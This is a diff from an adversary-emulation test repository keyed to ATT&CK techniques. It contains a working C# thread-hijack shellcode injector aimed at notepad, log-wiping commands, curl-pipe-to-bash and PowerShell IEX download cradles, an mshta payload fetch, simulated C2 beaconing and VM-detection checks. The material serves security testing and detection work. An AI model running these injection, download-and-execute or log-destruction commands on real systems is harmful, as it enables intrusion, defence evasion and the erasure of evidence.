public uint Eax;
// Retrieved by CONTEXT_CONTROL
public uint Ebp;
public uint Eip;
public uint SegCs;
public uint EFlags;
public uint Esp;
public uint SegSs;
// Retrieved by CONTEXT_EXTENDED_REGISTERS
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
public byte[] ExtendedRegisters;
}
// x64 m128a
[StructLayout(LayoutKind.Sequential)]
public struct M128A
{
public ulong High;
public long Low;
public override string ToString()
{
return string.Format("High:{0}, Low:{1}", this.High, this.Low);
}
}
// x64 save format
[StructLayout(LayoutKind.Sequential, Pack = 16)]
public struct XSAVE_FORMAT64
{
public ushort ControlWord;
public ushort StatusWord;
public byte TagWord;
public byte Reserved1;
public ushort ErrorOpcode;
public uint ErrorOffset;
public ushort ErrorSelector;
public ushort Reserved2;
public uint DataOffset;
public ushort DataSelector;
public ushort Reserved3;
public uint MxCsr;
public uint MxCsr_Mask;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
public M128A[] FloatRegisters;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
public M128A[] XmmRegisters;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 96)]
public byte[] Reserved4;
}
// x64 context structure
[StructLayout(LayoutKind.Sequential, Pack = 16)]
public struct CONTEXT64
{
public ulong P1Home;
public ulong P2Home;
public ulong P3Home;
public ulong P4Home;
public ulong P5Home;
public ulong P6Home;
public CONTEXT_FLAGS ContextFlags;
public uint MxCsr;
public ushort SegCs;
public ushort SegDs;
public ushort SegEs;
public ushort SegFs;
public ushort SegGs;
public ushort SegSs;
public uint EFlags;
public ulong Dr0;
public ulong Dr1;
public ulong Dr2;
public ulong Dr3;
public ulong Dr6;
public ulong Dr7;
public ulong Rax;
public ulong Rcx;
public ulong Rdx;
public ulong Rbx;
public ulong Rsp;
public ulong Rbp;
public ulong Rsi;
public ulong Rdi;
public ulong R8;
public ulong R9;
public ulong R10;
public ulong R11;
public ulong R12;
public ulong R13;
public ulong R14;
public ulong R15;
public ulong Rip;
public XSAVE_FORMAT64 DUMMYUNIONNAME;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 26)]
public M128A[] VectorRegister;
public ulong VectorControl;
public ulong DebugControl;
public ulong LastBranchToRip;
public ulong LastBranchFromRip;
public ulong LastExceptionToRip;
public ulong LastExceptionFromRip;
}
public static int Inject()
{
// Get target process by name
Process targetProcess = Process.GetProcessesByName("notepad")[0];
// Open and Suspend first thread
ProcessThread pT = targetProcess.Threads[0];
IntPtr pOpenThread = OpenThread(ThreadAccess.THREAD_HIJACK, false, (uint)pT.Id);
SuspendThread(pOpenThread);
// Get thread context
CONTEXT64 tContext = new CONTEXT64();
tContext.ContextFlags = CONTEXT_FLAGS.CONTEXT_FULL;
if (GetThreadContext(pOpenThread, ref tContext))
{
}
// WinExec shellcode from: https://github.com/peterferrie/win-exec-calc-shellcode
// Compiled with:
// nasm w64-exec-calc-shellcode.asm -DSTACK_ALIGN=TRUE -DFUNC=TRUE -DCLEAN=TRUE -o w64-exec-calc-shellcode.bin
byte[] payload = new byte[112] {
0x50,0x51,0x52,0x53,0x56,0x57,0x55,0x54,0x58,0x66,0x83,0xe4,0xf0,0x50,0x6a,0x60,0x5a,0x68,0x63,0x61,0x6c,0x63,0x54,0x59,0x48,0x29,0xd4,0x65,0x48,0x8b,0x32,0x48,0x8b,0x76,0x18,0x48,0x8b,0x76,0x10,0x48,0xad,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x30,0x03,0x57,0x3c,0x8b,0x5c,0x17,0x28,0x8b,0x74,0x1f,0x20,0x48,0x01,0xfe,0x8b,0x54,0x1f,0x24,0x0f,0xb7,0x2c,0x17,0x8d,0x52,0x02,0xad,0x81,0x3c,0x07,0x57,0x69,0x6e,0x45,0x75,0xef,0x8b,0x74,0x1f,0x1c,0x48,0x01,0xfe,0x8b,0x34,0xae,0x48,0x01,0xf7,0x99,0xff,0xd7,0x48,0x83,0xc4,0x68,0x5c,0x5d,0x5f,0x5e,0x5b,0x5a,0x59,0x58,0xc3
};
// Once shellcode has executed return to thread original EIP address (mov to rax then jmp to address)
byte[] mov_rax = new byte[2] {
0x48, 0xb8
};
byte[] jmp_address = BitConverter.GetBytes(tContext.Rip);
byte[] jmp_rax = new byte[2] {
0xff, 0xe0
};
// Build shellcode
byte[] shellcode = new byte[payload.Length + mov_rax.Length + jmp_address.Length + jmp_rax.Length];
payload.CopyTo(shellcode, 0);
mov_rax.CopyTo(shellcode, payload.Length);
jmp_address.CopyTo(shellcode, payload.Length+mov_rax.Length);
jmp_rax.CopyTo(shellcode, payload.Length+mov_rax.Length+jmp_address.Length);
// OpenProcess to allocate memory
IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id);
// Allocate memory for shellcode within process
IntPtr allocMemAddress = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)((shellcode.Length + 1) * Marshal.SizeOf(typeof(char))), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// Write shellcode within process
UIntPtr bytesWritten;
bool resp1 = WriteProcessMemory(procHandle, allocMemAddress, shellcode, (uint)((shellcode.Length + 1) * Marshal.SizeOf(typeof(char))), out bytesWritten);
// Read memory to view shellcode
int bytesRead = 0;
byte[] buffer = new byte[shellcode.Length];
ReadProcessMemory(procHandle, allocMemAddress, buffer, buffer.Length, ref bytesRead);
// Set context EIP to location of shellcode
tContext.Rip=(ulong)allocMemAddress.ToInt64();
// Apply new context to suspended thread
if(!SetThreadContext(pOpenThread, ref tContext))
{
}
if (GetThreadContext(pOpenThread, ref tContext))
{
}
// Resume the thread, redirecting execution to shellcode, then back to original process
ResumeThread(pOpenThread);
return 0;
}
}
public class Program
{
public static void Main()
{
//Test One:
Console.WriteLine("{0}", "#1 ProcessInject");
ProcessInject.Inject();
Console.WriteLine("{0}", "ProcessInject Complete");
//Test Two:
Console.WriteLine("{0}", "#2 ApcInjectionAnyProcess");
ApcInjectionAnyProcess.Inject();
Console.WriteLine("{0}", "ApcInjectionAnyProcess Complete");
//Test Three:
Console.WriteLine("{0}", "#3 ApcInjectionNewProcess");
ApcInjectionNewProcess.Inject();
Console.WriteLine("{0}", "ApcInjectionNewProcess Complete");
//Test Four:
Console.WriteLine("{0}", "#4 IatInjection");
IatInjection.Inject();
Console.WriteLine("{0}", "IatInjection Complete");
//Test Five:
Console.WriteLine("{0}", "#5 ThreadHijack");
ThreadHijack.Inject();
Console.WriteLine("{0}", "ThreadHijack Complete ");
}
}
atomics/T1060/T1060.md
+1 -1
View File
@@ -8,7 +8,7 @@ The following run keys are created by default on Windows systems:
* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run</code>
* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>
The <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx</code> is also available but is not created by default on Windows Visa and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: <code>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018)
The <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx</code> is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: <code>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018)
The following Registry keys can be used to set startup folder items for persistence:
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>
atomics/T1063/T1063.md
+1 -1
View File
@@ -1,6 +1,6 @@
# T1063 - Security Software Discovery
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1063)
<blockquote>Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules, anti-virus, and virtualization. These checks may be built into early-stage remote access tools.
<blockquote>Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. These checks may be built into early-stage remote access tools.
### Windows
atomics/T1064/T1064.md
+1 -1
View File
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1064)
<blockquote>Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.
Scripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macos being allowed or that the user will accept to activate them.
Scripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macros being allowed or that the user will accept to activate them.
Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. (Citation: Metasploit) (Citation: Metasploit), (Citation: Veil) (Citation: Veil), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)</blockquote>
atomics/T1070/T1070.md
+40
View File
@@ -26,6 +26,10 @@ Logs may also be cleared through other mechanisms, such as [PowerShell](https://
- [Atomic Test #3 - rm -rf](#atomic-test-3---rm--rf)
- [Atomic Test #4 - Overwrite Linux Mail Spool](#atomic-test-4---overwrite-linux-mail-spool)
- [Atomic Test #5 - Overwrite Linux Log](#atomic-test-5---overwrite-linux-log)
<br/>
@@ -72,3 +76,39 @@ rm -rf /private/var/log/system.log*
rm -rf /private/var/audit/*
```
<br/>
<br/>
## Atomic Test #4 - Overwrite Linux Mail Spool
This test overwrites the Linux mail spool of a specified user. This technique was used by threat actor Rocke during the exploitation of Linux web servers.
**Supported Platforms:** Linux
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of mail spool | String | root|
#### Run it with `bash`!
```
echo 0> /var/spool/mail/#{username}
```
<br/>
<br/>
## Atomic Test #5 - Overwrite Linux Log
This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers.
**Supported Platforms:** Linux
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| log_path | Path of specified log | Path | /var/log/secure|
#### Run it with `bash`!
```
echo 0> #{log_path}
```
<br/>
atomics/T1070/T1070.yaml
+32
View File
@@ -17,6 +17,7 @@ atomic_tests:
name: command_prompt
command: |
wevtutil cl #{log_name}
- name: FSUtil
description: |
Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume.
@@ -26,6 +27,7 @@ atomic_tests:
name: command_prompt
command: |
fsutil usn deletejournal /D C:
- name: rm -rf
description: |
Delete system and audit logs
@@ -37,3 +39,33 @@ atomic_tests:
command: |
rm -rf /private/var/log/system.log*
rm -rf /private/var/audit/*
- name: Overwrite Linux Mail Spool
description: |
This test overwrites the Linux mail spool of a specified user. This technique was used by threat actor Rocke during the exploitation of Linux web servers.
supported_platforms:
- linux
input_arguments:
username:
description: Username of mail spool
type: String
default: root
executor:
name: bash
command: |
echo 0> /var/spool/mail/#{username}
- name: Overwrite Linux Log
description: |
This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers.
supported_platforms:
- linux
input_arguments:
log_path:
description: Path of specified log
type: Path
default: /var/log/secure
executor:
name: bash
command: |
echo 0> #{log_path}
atomics/T1071/T1071.md
+57
View File
@@ -0,0 +1,57 @@
# T1071 - Standard Application Layer Protocol
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1071)
<blockquote>Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are RPC, SSH, or RDP.</blockquote>
## Atomic Tests
- [Atomic Test #1 - Malicious User Agents](#atomic-test-1---malicious-user-agents)
- [Atomic Test #2 - Malicious User Agents - Nix](#atomic-test-2---malicious-user-agents---nix)
<br/>
## Atomic Test #1 - Malicious User Agents
This test simulates an infected host beaconing to command and control.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | Default domain to simulate against | string | www.google.com|
#### Run it with `powershell`!
```
Invoke-WebRequest #{domain} -UserAgent "HttpBrowser/1.0" | out-null
Invoke-WebRequest #{domain} -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null
Invoke-WebRequest #{domain} -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
Invoke-WebRequest #{domain} -UserAgent "*<|>*" | out-null
```
<br/>
<br/>
## Atomic Test #2 - Malicious User Agents - Nix
This test simulates an infected host beaconing to command and control.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
**Supported Platforms:** Linux, macOS
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | Default domain to simulate against | string | www.google.com|
#### Run it with `sh`!
```
curl -s -A "HttpBrowser/1.0" -m3 #{domain}
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain}
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain}
curl -s -A "*<|>*" -m3 #{domain}
```
<br/>
atomics/T1071/T1071.yaml
+45
View File
@@ -0,0 +1,45 @@
---
attack_technique: T1071
display_name: Standard Application Layer Protocol
atomic_tests:
- name: Malicious User Agents
description: |
This test simulates an infected host beaconing to command and control.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
supported_platforms:
- windows
input_arguments:
domain:
description: Default domain to simulate against
type: string
default: www.google.com
executor:
name: powershell
command: |
Invoke-WebRequest #{domain} -UserAgent "HttpBrowser/1.0" | out-null
Invoke-WebRequest #{domain} -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null
Invoke-WebRequest #{domain} -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
Invoke-WebRequest #{domain} -UserAgent "*<|>*" | out-null
- name: Malicious User Agents - Nix
description: |
This test simulates an infected host beaconing to command and control.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
supported_platforms:
- linux
- macos
input_arguments:
domain:
description: Default domain to simulate against
type: string
default: www.google.com
executor:
name: sh
command: |
curl -s -A "HttpBrowser/1.0" -m3 #{domain}
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain}
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain}
curl -s -A "*<|>*" -m3 #{domain}
atomics/T1074/Discovery.sh
+15
View File
@@ -0,0 +1,15 @@
#!/bin/
curl ifconfig.me
ifconfig
whoami
pwd
ls -lhart /Users/
ls /Applications/
ls /Library/
crontab -l
at -l
netstat -an | grep -i listen
netstat -an | grep -i established
arp -a
ps aux
atomics/T1074/T1074.md
+6 -6
View File
@@ -6,19 +6,19 @@ Interactive command shells may be used, and common functionality within [cmd](ht
## Atomic Tests
- [Atomic Test #1 - Stage data from Discovery.bat](#atomic-test-1---stage-data-from-discoverybat)
- [Atomic Test #1 - Stage data from Discovery.sh](#atomic-test-1---stage-data-from-discoverysh)
<br/>
## Atomic Test #1 - Stage data from Discovery.bat
Utilize powershell to download discovery.bat and save to a local file
## Atomic Test #1 - Stage data from Discovery.sh
Utilize curl to download discovery.sh and execute a basic information gathering shell script
**Supported Platforms:** Windows
**Supported Platforms:** Linux, macOS
#### Run it with `powershell`!
#### Run it with `bash`!
```
"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > c:\windows\pi.log
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.sh | bash -s > /tmp/discovery.log
```
<br/>
atomics/T1074/T1074.yaml
+14
View File
@@ -14,3 +14,17 @@ atomic_tests:
name: powershell
command: |
"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > c:\windows\pi.log
atomic_tests:
- name: Stage data from Discovery.sh
description: |
Utilize curl to download discovery.sh and execute a basic information gathering shell script
supported_platforms:
- linux
- macos
executor:
name: bash
command: |
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.sh | bash -s > /tmp/discovery.log
atomics/T1082/T1082.md
+42
View File
@@ -18,6 +18,10 @@ On Mac, the <code>systemsetup</code> command gives a detailed breakdown of the s
- [Atomic Test #3 - List OS Information](#atomic-test-3---list-os-information)
- [Atomic Test #4 - Linux VM Check via Hardware](#atomic-test-4---linux-vm-check-via-hardware)
- [Atomic Test #5 - Linux VM Check via Kernel Modules](#atomic-test-5---linux-vm-check-via-kernel-modules)
<br/>
@@ -62,5 +66,43 @@ uname -a >> /tmp/loot.txt
cat /etc/lsb-release >> /tmp/loot.txt
cat /etc/redhat-release >> /tmp/loot.txt
uptime >> /tmp/loot.txt
cat /etc/issue >> /tmp/loot.txt
```
<br/>
<br/>
## Atomic Test #4 - Linux VM Check via Hardware
Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware.
**Supported Platforms:** Linux
#### Run it with `bash`!
```
cat /sys/class/dmi/id/bios_version | grep -i amazon
cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware"
cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU"
sudo dmidecode | grep -i "microsoft\|vmware\|virtualbox\|quemu\|domu"
cat /proc/scsi/scsi | grep -i "vmware\|vbox"
cat /proc/ide/hd0/model | grep -i "vmware\|vbox\|qemu\|virtual"
sudo lspci | grep -i "vmware\|virtualbox"
sudo lscpu | grep -i "Xen\|KVM\|Microsoft"
```
<br/>
<br/>
## Atomic Test #5 - Linux VM Check via Kernel Modules
Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware.
**Supported Platforms:** Linux
#### Run it with `bash`!
```
sudo lsmod | grep -i "vboxsf\|vboxguest"
sudo lsmod | grep -i "vmw_baloon\|vmxnet"
sudo lsmod | grep -i "xen-vbd\|xen-vnif"
sudo lsmod | grep -i "virtio_pci\|virtio_net"
sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"
```
<br/>
atomics/T1082/T1082.yaml
+36
View File
@@ -46,3 +46,39 @@ atomic_tests:
cat /etc/lsb-release >> /tmp/loot.txt
cat /etc/redhat-release >> /tmp/loot.txt
uptime >> /tmp/loot.txt
cat /etc/issue >> /tmp/loot.txt
- name: Linux VM Check via Hardware
description: |
Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware.
supported_platforms:
- linux
executor:
name: bash
command: |
cat /sys/class/dmi/id/bios_version | grep -i amazon
cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware"
cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU"
sudo dmidecode | grep -i "microsoft\|vmware\|virtualbox\|quemu\|domu"
cat /proc/scsi/scsi | grep -i "vmware\|vbox"
cat /proc/ide/hd0/model | grep -i "vmware\|vbox\|qemu\|virtual"
sudo lspci | grep -i "vmware\|virtualbox"
sudo lscpu | grep -i "Xen\|KVM\|Microsoft"
- name: Linux VM Check via Kernel Modules
description: |
Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware.
supported_platforms:
- linux
executor:
name: bash
command: |
sudo lsmod | grep -i "vboxsf\|vboxguest"
sudo lsmod | grep -i "vmw_baloon\|vmxnet"
sudo lsmod | grep -i "xen-vbd\|xen-vnif"
sudo lsmod | grep -i "virtio_pci\|virtio_net"
sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"
atomics/T1086/T1086.md
+38 -19
View File
@@ -6,7 +6,9 @@ PowerShell may also be used to download and run executables from the Internet, w
Administrator permissions are required to use PowerShell to connect to remote systems.
A number of PowerShell-based offensive testing tools are available, including Empire, (Citation: Github PowerShell Empire) PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)</blockquote>
A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)
PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) (Citation: Microsoft PSfromCsharp APR 2014)</blockquote>
## Atomic Tests
@@ -22,15 +24,17 @@ A number of PowerShell-based offensive testing tools are available, including Em
- [Atomic Test #6 - PowerShell Add User](#atomic-test-6---powershell-add-user)
- [Atomic Test #7 - Powershell MsXml COM object](#atomic-test-7---powershell-msxml-com-object)
- [Atomic Test #7 - Powershell MsXml COM object - no prompt](#atomic-test-7---powershell-msxml-com-object---no-prompt)
- [Atomic Test #8 - Powershell XML requests](#atomic-test-8---powershell-xml-requests)
- [Atomic Test #8 - Powershell MsXml COM object - with prompt](#atomic-test-8---powershell-msxml-com-object---with-prompt)
- [Atomic Test #9 - Powershell invoke mshta.exe download](#atomic-test-9---powershell-invoke-mshtaexe-download)
- [Atomic Test #9 - Powershell XML requests](#atomic-test-9---powershell-xml-requests)
- [Atomic Test #10 - Powershell Invoke-DownloadCradle](#atomic-test-10---powershell-invoke-downloadcradle)
- [Atomic Test #10 - Powershell invoke mshta.exe download](#atomic-test-10---powershell-invoke-mshtaexe-download)
- [Atomic Test #11 - PowerShell Fileless Script Execution](#atomic-test-11---powershell-fileless-script-execution)
- [Atomic Test #11 - Powershell Invoke-DownloadCradle](#atomic-test-11---powershell-invoke-downloadcradle)
- [Atomic Test #12 - PowerShell Fileless Script Execution](#atomic-test-12---powershell-fileless-script-execution)
<br/>
@@ -62,11 +66,11 @@ Download Bloodhound and run it
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bloodurl | BloodHound URL | url | https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1|
| bloodurl | BloodHound URL | url | https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1|
#### Run it with `command_prompt`!
```
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Get-BloodHoundData"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound"
```
<br/>
<br/>
@@ -78,11 +82,6 @@ Reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FR
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bloodurl | BloodHound URL | url | https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1|
#### Run it with `powershell`!
```
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
@@ -142,7 +141,7 @@ New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password
<br/>
<br/>
## Atomic Test #7 - Powershell MsXml COM object
## Atomic Test #7 - Powershell MsXml COM object - no prompt
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell MsXml COM object.
Not proxy aware removing cache although does not appear to write to those locations
@@ -162,7 +161,27 @@ powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Ob
<br/>
<br/>
## Atomic Test #8 - Powershell XML requests
## Atomic Test #8 - Powershell MsXml COM object - with prompt
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell MsXml COM object.
Not proxy aware removing cache although does not appear to write to those locations
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1|
#### Run it with `command_prompt`!
```
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
```
<br/>
<br/>
## Atomic Test #9 - Powershell XML requests
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell xml download request
@@ -181,7 +200,7 @@ Powershell xml download request
<br/>
<br/>
## Atomic Test #9 - Powershell invoke mshta.exe download
## Atomic Test #10 - Powershell invoke mshta.exe download
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell invoke mshta to download payload
@@ -195,12 +214,12 @@ Powershell invoke mshta to download payload
#### Run it with `powershell`!
```
"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject("script:#{url}").Exec();close()"
"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
```
<br/>
<br/>
## Atomic Test #10 - Powershell Invoke-DownloadCradle
## Atomic Test #11 - Powershell Invoke-DownloadCradle
Provided by https://github.com/mgreen27/mgreen27.github.io
Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
@@ -215,7 +234,7 @@ Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
<br/>
<br/>
## Atomic Test #11 - PowerShell Fileless Script Execution
## Atomic Test #12 - PowerShell Fileless Script Execution
Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections.
**Supported Platforms:** Windows
atomics/T1086/T1086.yaml
+24 -10
View File
@@ -32,12 +32,12 @@ atomic_tests:
bloodurl:
description: BloodHound URL
type: url
default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1
default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1
executor:
name: command_prompt
command: |
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Get-BloodHoundData"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound"
- name: Obfuscation Tests
description: |
@@ -47,12 +47,6 @@ atomic_tests:
supported_platforms:
- windows
input_arguments:
bloodurl:
description: BloodHound URL
type: url
default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1
executor:
name: powershell
command: |
@@ -116,7 +110,7 @@ atomic_tests:
command: |
New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description '#{description}'
- name: Powershell MsXml COM object
- name: Powershell MsXml COM object - no prompt
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell MsXml COM object.
@@ -136,6 +130,26 @@ atomic_tests:
command: |
powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
- name: Powershell MsXml COM object - with prompt
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell MsXml COM object.
Not proxy aware removing cache although does not appear to write to those locations
supported_platforms:
- windows
input_arguments:
url:
description: url of payload to execute
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1
executor:
name: command_prompt
command: |
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
- name: Powershell XML requests
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
@@ -172,7 +186,7 @@ atomic_tests:
executor:
name: powershell
command: |
"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject("script:#{url}").Exec();close()"
"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
- name: Powershell Invoke-DownloadCradle
description: |
atomics/T1099/T1099.md
+69
View File
@@ -12,6 +12,12 @@
- [Atomic Test #4 - Modify file timestamps using reference file](#atomic-test-4---modify-file-timestamps-using-reference-file)
- [Atomic Test #5 - Windows - Modify file creation timestamp with PowerShell](#atomic-test-5---windows---modify-file-creation-timestamp-with-powershell)
